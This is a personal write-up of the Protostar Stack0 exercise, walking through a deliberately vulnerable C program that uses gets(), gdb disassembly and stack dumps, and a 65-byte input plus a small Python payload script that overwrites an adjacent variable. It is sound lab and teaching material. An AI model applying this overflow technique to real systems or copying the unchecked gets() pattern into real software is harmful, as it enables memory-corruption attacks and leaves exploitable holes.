Getting into Buffer Overflows
Protostar Exploit Learning
A while ago, I started (again) to play around with buffer overflows. To get a bit more practice, I decided to work through the Protostar exercises.
I will share my workflow and walkthroughs for the levels, mostly for my own sake, so I can come back to the write-ups when I need them. So, welcome to my buffer overflow journey and have a great time!
Stack0
This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify the program execution.
This is the very first level of Protostar, and it should give you a good introduction to how buffer overflows work in general.
Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
The code is quite simple. We have a buffer array of 64 bytes and a modified variable.
The program uses gets() to read some data into buffer and then checks whether modified is not equal to zero.
Now you may think: "But modified never gets reassigned", and indeed, that is true. But we need to take a closer look at the gets() function.
gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed.
That is the description from the man page, and it does not sound great. In fact, it sounds quite insecure: gets() keeps writing for as long as input arrives, no matter how small the buffer is.
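To make that last sentence of the man page a bit more tangible, here is a small Python model of what happens. It is only a sketch under assumptions: the toy frame places modified directly after the 64-byte buffer (a compiler is free to lay things out differently), and make_frame, unsafe_gets and read_modified are names I made up for the illustration, not anything from Protostar or libc.

```python
BUFFER_SIZE = 64   # char buffer[64]
INT_SIZE = 4       # assumed size of a 32-bit int


def make_frame():
    """Toy frame (assumed layout): 64 zeroed buffer bytes, then modified."""
    return bytearray(BUFFER_SIZE + INT_SIZE)


def unsafe_gets(frame, line):
    """Copy line plus a terminating NUL into the frame without checking
    BUFFER_SIZE, which is the behaviour the man page warns about."""
    # The model stops at the end of the toy frame; the real gets() would not.
    data = (line + b"\x00")[:len(frame)]
    frame[:len(data)] = data
    return frame


def read_modified(frame):
    """Interpret the four bytes after the buffer as a little-endian int."""
    return int.from_bytes(frame[BUFFER_SIZE:BUFFER_SIZE + INT_SIZE], "little")


if __name__ == "__main__":
    for count in (10, 64, 65):
        frame = unsafe_gets(make_frame(), b"A" * count)
        print(count, hex(read_modified(frame)))
    # prints:
    # 10 0x0
    # 64 0x0
    # 65 0x41
```

With 64 characters only the terminating NUL lands outside the buffer, so the modelled variable stays 0. The 65th character is the first one that changes it.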
GDB
Now it is time for some reversing. As Protostar lives in a VM, we are going to use vanilla gdb. Please bear with me, as I am quite new to gdb and don't know all the tricks ;)
First, we load our executable into gdb with gdb /opt/protostar/bin/stack0
Setup
Before we start disassembling, I would like to change a few gdb settings.
With set disassembly-flavor intel we set the assembly syntax to Intel, which I prefer.
Then we add a hook:
define hook-stop
info registers
x/24wx $esp
x/2i $eip
end
So every time execution stops, for example at a breakpoint, gdb prints the registers, 24 words of the stack, and the next two instructions.
Reversing
Now we can start disassembling our executable by typing:
disassemble main
which results in the following output:
Dump of assembler code for function main:
0x080483f4 <main+0>: push ebp
0x080483f5 <main+1>: mov ebp,esp
0x080483f7 <main+3>: and esp,0xfffffff0
0x080483fa <main+6>: sub esp,0x60
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>: lea eax,[esp+0x1c]
0x08048409 <main+21>: mov DWORD PTR [esp],eax
0x0804840c <main+24>: call 0x804830c <gets@plt>
0x08048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
0x08048419 <main+37>: mov DWORD PTR [esp],0x8048500
0x08048420 <main+44>: call 0x804832c <puts@plt>
0x08048425 <main+49>: jmp 0x8048433 <main+63>
0x08048427 <main+51>: mov DWORD PTR [esp],0x8048529
0x0804842e <main+58>: call 0x804832c <puts@plt>
0x08048433 <main+63>: leave
0x08048434 <main+64>: ret
If we compare the disassembly with the provided C code, we can see quite clearly what's going on.
For example, 0x0 gets moved into [esp+0x5c], which is very likely modified = 0.
Likewise, lea eax,[esp+0x1c] loads the address that is passed to gets(), so buffer starts at esp+0x1c.
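The two stack offsets in the disassembly already tell us how far modified is from the start of the buffer. Here is the arithmetic as a tiny Python sketch. The constants are copied from the listing above (0x1c from the lea before the gets() call, 0x5c from the mov that zeroes the variable, 0x60 from sub esp,0x60); the names are my own.

```python
FRAME_SIZE = 0x60        # sub esp,0x60
BUFFER_OFFSET = 0x1C     # lea eax,[esp+0x1c]  (argument passed to gets)
MODIFIED_OFFSET = 0x5C   # mov DWORD PTR [esp+0x5c],0x0
INT_SIZE = 4             # modified is accessed as a DWORD


def bytes_until_modified(buffer_offset=BUFFER_OFFSET,
                         modified_offset=MODIFIED_OFFSET):
    """Number of bytes between the start of buffer and modified."""
    return modified_offset - buffer_offset


if __name__ == "__main__":
    print(bytes_until_modified())                    # prints 64
    print(MODIFIED_OFFSET + INT_SIZE == FRAME_SIZE)  # prints True
```

So modified sits exactly 64 bytes after the start of the buffer and occupies the last four bytes of the 0x60 bytes reserved by main.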
Now we add two breakpoints:
break *0x0804840c
break *0x08048411
The first one is on the call to the gets() function, and the second one is on the mov instruction right after it.
Why are we adding the breakpoints there, you may ask? Simply because we want to see the stack before and after we enter some input.
Now it's time to run our binary by typing r, and we should see the following output:
Starting program: /opt/protostar/bin/stack0 a
eax 0xbffffc7c -1073742724
ecx 0xf0feeff1 -251727887
edx 0x2 2
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x804840c 0x804840c <main+24>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0xb7eada75
0xbffffc80: 0xb7fd7ff4 0x08049620 0xbffffc98 0x080482e8
0xbffffc90: 0xb7ff1040 0x08049620 0xbffffcc8 0x08048469
0xbffffca0: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffcc8
0xbffffcb0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0x804840c <main+24>: call 0x804830c <gets@plt>
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
Because of the hook we created earlier, we now see the following three parts.
Registers
eax 0xbffffc7c -1073742724
ecx 0xf0feeff1 -251727887
edx 0x2 2
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x804840c 0x804840c <main+24>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
Stack
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0xb7eada75
0xbffffc80: 0xb7fd7ff4 0x08049620 0xbffffc98 0x080482e8
0xbffffc90: 0xb7ff1040 0x08049620 0xbffffcc8 0x08048469
0xbffffca0: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffcc8
0xbffffcb0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
Next two instructions
0x804840c <main+24>: call 0x804830c <gets@plt>
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
Okay, so our first breakpoint, the one on the gets() call, got hit, and execution is paused there. Now we continue by typing c and can enter some characters.
(gdb) c
Continuing.
AAAAAAAAAA
And our output will look like this:
eax 0xbffffc7c -1073742724
ecx 0xbffffc7c -1073742724
edx 0xb7fd9334 -1208118476
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x8048411 0x8048411 <main+29>
eflags 0x200246 [ PF ZF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0x41414141
0xbffffc80: 0x41414141 0x08004141 0xbffffc98 0x080482e8
0xbffffc90: 0xb7ff1040 0x08049620 0xbffffcc8 0x08048469
0xbffffca0: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffcc8
0xbffffcb0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x8048415 <main+33>: test eax,eax
If you now take a close look at the stack, you will notice 0x41414141 starting at 0xbffffc7c. These are the A's we entered earlier, shown as hex values (0x41 is the ASCII code for A). Cool.
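If you want to double-check how the ten A's map onto the words gdb prints, the following Python sketch unpacks a few words from the dump into their bytes. gdb shows each word as a little-endian 32-bit value, so the bytes appear reversed within a word. word_to_bytes and printable are helper names I made up for this.

```python
import struct


def word_to_bytes(word):
    """Return the 4 bytes of a 32-bit word in memory order (little-endian)."""
    return struct.pack("<I", word)


def printable(raw):
    """Render bytes as ASCII, using '.' for anything non-printable."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


if __name__ == "__main__":
    # The three words starting at 0xbffffc7c after entering AAAAAAAAAA.
    for word in (0x41414141, 0x41414141, 0x08004141):
        raw = word_to_bytes(word)
        hex_bytes = " ".join(f"{b:02x}" for b in raw)
        print(f"{word:#010x} -> {hex_bytes} -> {printable(raw)}")
```

The last word, 0x08004141, holds the final two A's, then the null byte that gets() appended, then a leftover 0x08 from the value that was there before (0x08049620).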
What am I doing here
Now, you may be a bit lost. What was our initial goal again? Well, the goal is to overwrite the modified variable. Do you remember the variable initialization? It was mov DWORD PTR [esp+0x5c],0x0.
So let's examine this address by typing:
x/wx $esp+0x5c
And we see that the value is still 0.
(gdb) x/wx $esp+0x5c
0xbffffcbc: 0x00000000
Now if you take another look at our stack dump, the very last value was also 0x00000000. What we now try to do is enter so many characters that this value gets overwritten.
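It is no coincidence that the last word of the dump is our variable. The hook prints 24 words starting at esp, four per line, so an offset from esp maps directly to a row and column. A short Python sketch of that mapping, with locate being a hypothetical helper name and the esp value taken from the register output above:

```python
WORD_SIZE = 4
WORDS_PER_ROW = 4   # the x/24wx output above shows four words per line


def locate(esp, offset):
    """Return (address, row, column) of esp+offset in the x/24wx $esp dump.
    Row and column are zero-based."""
    index = offset // WORD_SIZE
    return esp + offset, index // WORDS_PER_ROW, index % WORDS_PER_ROW


if __name__ == "__main__":
    for name, offset in (("buffer", 0x1C), ("modified", 0x5C)):
        address, row, column = locate(0xBFFFFC60, offset)
        print(f"{name}: {address:#x}, row {row}, column {column}")
    # prints:
    # buffer: 0xbffffc7c, row 1, column 3
    # modified: 0xbffffcbc, row 5, column 3
```

Row 5, column 3 is the very last of the 24 words, at 0xbffffcbc, which matches what x/wx $esp+0x5c reported.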
Let's run it again and continue with a larger string:
(gdb) c
Continuing.
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFF
eax 0xbffffc7c -1073742724
ecx 0xbffffc7c -1073742724
edx 0xb7fd9334 -1208118476
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x8048411 0x8048411 <main+29>
eflags 0x200246 [ PF ZF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0x41414141
0xbffffc80: 0x41414141 0x42424242 0x42424242 0x43434343
0xbffffc90: 0x43434343 0x44444444 0x44444444 0x45454545
0xbffffca0: 0x45454545 0x46464646 0x46464646 0xbffffc00
0xbffffcb0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x8048415 <main+33>: test eax,eax
Now we can clearly see the pattern here. First, we have two blocks of 0x41414141, which are our AAAAAAAA, then two blocks of 0x42424242, which are our BBBBBBBB, and so on. Now you can also see why I picked that particular string: it is easy to recognise, and you can count how many more characters you need to reach 0x00000000.
So far we have filled 12 blocks of 4 characters each, which makes 48 characters. If we add 4 more blocks, we are at 64 characters, and our result will look like this:
(gdb) c
Continuing.
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHH
0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xb7fd7ff4 0xb7ec6165 0xbffffc88 0x41414141
0x41414141 0x42424242 0x42424242 0x43434343
0x43434343 0x44444444 0x44444444 0x45454545
0x45454545 0x46464646 0x46464646 0x47474747
0x47474747 0x48484848 0x48484848 0x00000000
Which makes total sense, because if you check the source code, the buffer array is defined with a size of 64:
char buffer[64];
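Typing those lettered strings by hand gets tedious, so here is a minimal Python sketch that builds the same kind of pattern and tells you at which offset a given letter starts. make_pattern and offset_of are names I picked for the illustration. The group size of 8 simply mirrors the strings used above.

```python
import string


def make_pattern(length, group=8):
    """Build AAAAAAAABBBBBBBB...: each uppercase letter repeated `group` times,
    cut off after `length` characters."""
    letters = string.ascii_uppercase
    if length > group * len(letters):
        raise ValueError("pattern would run out of letters")
    return "".join(letter * group for letter in letters)[:length]


def offset_of(letter, group=8):
    """Offset at which the first occurrence of `letter` sits in the pattern."""
    return string.ascii_uppercase.index(letter) * group


if __name__ == "__main__":
    print(make_pattern(48))        # the A..F string from above
    print(len(make_pattern(64)))   # prints 64
    print(offset_of("I"))          # prints 64
```

Since I starts at offset 64, it is the first letter that falls outside the 64-byte buffer.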
Solution
With that in mind, we can now solve this challenge by simply adding one more character to our string.
(gdb) c
Continuing.
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHI
eax 0xbffffc7c -1073742724
ecx 0xbffffc7c -1073742724
edx 0xb7fd9334 -1208118476
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc60 0xbffffc60
ebp 0xbffffcc8 0xbffffcc8
esi 0x0 0
edi 0x0 0
eip 0x8048411 0x8048411 <main+29>
eflags 0x200246 [ PF ZF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0xbffffc60: 0xbffffc7c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc70: 0xb7fd7ff4 0xb7ec6165 0xbffffc88 0x41414141
0xbffffc80: 0x41414141 0x42424242 0x42424242 0x43434343
0xbffffc90: 0x43434343 0x44444444 0x44444444 0x45454545
0xbffffca0: 0x45454545 0x46464646 0x46464646 0x47474747
0xbffffcb0: 0x47474747 0x48484848 0x48484848 0x00000049
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x8048415 <main+33>: test eax,eax
Breakpoint 4, main (argc=2, argv=0xbffffd74) at stack0/stack0.c:13
13 in stack0/stack0.c
If we examine the address of our modified variable with
x/wx $esp+0x5c
0xbffffcbc: 0x00000049
we see that its value has changed and is no longer 0. 0x49 is the ASCII code of the I we appended.
Now we can continue running the program and get our desired output.
(gdb) c
Continuing.
you have changed the 'modified' variable
Program exited with code 051.
Error while running hook_stop:
The program has no registers now.
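Outside of gdb, the same input can be generated by a script instead of typed by hand. The following is a minimal Python 3 sketch. build_payload is a name I made up, and whether Python 3 is available inside the Protostar VM is an assumption on my side, so you may have to run it elsewhere or adapt it.

```python
import sys

BUFFER_SIZE = 64   # char buffer[64]


def build_payload(filler=b"A", marker=b"I"):
    """64 filler bytes to fill the buffer, one marker byte that lands in
    modified, and a newline so gets() stops reading."""
    return filler * BUFFER_SIZE + marker + b"\n"


if __name__ == "__main__":
    # Write raw bytes so nothing is re-encoded on the way to the program.
    sys.stdout.buffer.write(build_payload())
```

Saved under a hypothetical name such as payload.py, the output could be piped into the binary with python3 payload.py | /opt/protostar/bin/stack0, which should lead to the same message we just saw in gdb.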